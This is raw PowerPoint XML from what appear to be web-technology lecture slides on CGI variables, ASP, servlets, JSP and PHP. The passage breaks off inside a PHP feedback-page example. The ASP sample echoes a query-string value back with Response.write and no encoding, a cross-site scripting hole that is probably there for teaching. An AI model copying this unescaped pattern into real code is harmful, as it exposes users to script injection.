          <a:prstGeom prst="borderCallout1">
            <a:avLst>
              <a:gd name="adj1" fmla="val 15449"/>
              <a:gd name="adj2" fmla="val 106093"/>
              <a:gd name="adj3" fmla="val 35551"/>
              <a:gd name="adj4" fmla="val 129619"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent3">
              <a:lumMod val="60000"/>
              <a:lumOff val="40000"/>
            </a:schemeClr>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-GB" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="HG Mincho Light J" charset="0"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>CGI, PHP, ASP</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="HG Mincho Light J" charset="0"/>
              <a:cs typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="38" name="Text Box 13"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2126998" y="3596882"/>
            <a:ext cx="775202" cy="292676"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="83598" tIns="41799" rIns="83598" bIns="41799">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" defTabSz="828675" eaLnBrk="0" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="96000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="45000"/>
              <a:buFont typeface="StarSymbol" charset="0"/>
              <a:buNone/>
              <a:tabLst>
                <a:tab pos="657225" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="HG Mincho Light J" charset="0"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Firewall</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="39" name="Text Box 23"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4213985" y="3627339"/>
            <a:ext cx="1156279" cy="292676"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="83598" tIns="41799" rIns="83598" bIns="41799">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" defTabSz="828675" eaLnBrk="0" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="96000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="45000"/>
              <a:buFont typeface="StarSymbol" charset="0"/>
              <a:buNone/>
              <a:tabLst>
                <a:tab pos="657225" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="HG Mincho Light J" charset="0"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Proxy Server</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="36402047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p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>CGI Programs</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="663555" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Can be written in any language</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Input to the program is piped into the process’ stdin</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Parameters are passed by setting environment variables</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>REQUEST_METHOD :GET, HEAD or POST</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>PATH_INFO : path in the URL that follows the program name and precedes “?”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>QUERY_STRING: information that follows “?”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>CONTENT_TYPE : MIME type of the data for the POST method</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>CONTENT_LENGTH : size of the data for the POST method</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>HTTP_&lt;field&gt;: value of corresponding header field</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="381374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r>
              <a:rPr lang="en-US"/>
              <a:t>CGI Variables</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="680963" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>SERVER_SOFTWARE : name/version of server software</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>SERVER_NAME : server hostname</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>GATEWAY_INTERFACE : CGI version</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>SERVER_PROTOCOL : server protocol version</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>SERVER_PORT : TCP port used by the server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>PATH_TRANSLATED : PATH_INFO for non-Unix OSs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>SCRIPT_NAME : name of the script</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>REMOTE_HOST : hostname of the client</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>REMOTE_ADDR : address of the client</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>AUTH_TYPE : authentication mechanism used</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>REMOTE_USER : authenticated user name</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>REMOTE_IDENT : user name as returned by identd</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="17902191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1AF7-D570-B1E4-BA89-0B66C1CCCD24}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Post-CGI Evolution</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{44A86F0F-8C6E-6F98-6C3D-45A3E39AD462}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The success of the CGI mechanisms supported the creation of a number of other server-side execution technologies</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Active Server Pages (Deprecated since 2020)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Java Servlets </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Java Server Pages (JSP)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>PHP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="35987317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a:t>Active Server Pages</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="689155" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Microsoft’s answer to CGI scripts </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Pages that contain a mix of</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Text</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>HTML tags</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Scripting directives (mostly VBScript and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>JScript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Server-side includes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Page scripting directives are executed on the server side before serving the page</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>ASP.NET provide access to a number of easy-to-use built-in objects  </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="14648864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p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Active Server Pages</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="864259" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>&lt;% </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>strName</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>request.querystring</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>("Name")</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>   If </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>strName</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t> &lt;&gt; “” Then%&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>&lt;b&gt;Welcome!&lt;/b&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>&lt;% </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>Response.write</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>strName</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>   Else %&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>&lt;b&gt;You didn’t provide a name...&lt;/b&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>&lt;% End If %&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3449149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r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Servlets And </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>JavaServer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Pages (J2EE)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="667651" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Servlets are Java programs that are executed on the server </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Similar to CGI programs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>They can be executed within an existing JVM without having to create a new process	</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>JavaServer Pages (JSP) are static HTML intermixed with Java code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Similar to Microsoft’s Active Server Pages</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Allow one to specify both the dynamic and the static parts of a page</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>They are compiled into servlets</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4860699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p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>PHP</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="865283" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The “PHP Hypertext Processor” is a scripting language that can be embedded in HTML pages to generate dynamic content</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>PHP code is executed on the server side when the page containing the code is requested</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A common setup is a LAMP system, which is the composition of</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Linux </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Apache</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>MySQL</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>PHP</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="41485916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p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Example</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="866307" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>&lt;html&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>  &lt;head&gt; &lt;title&gt;Feedback Page&lt;/title&gt;&lt;/head&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>  &lt;body&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>    &lt;h1&gt;Feedback Page&lt;/h1&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>    &lt;?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>$name = $_POST['name'];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>$comment = $_POST['comment'];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>$file = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>fopen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
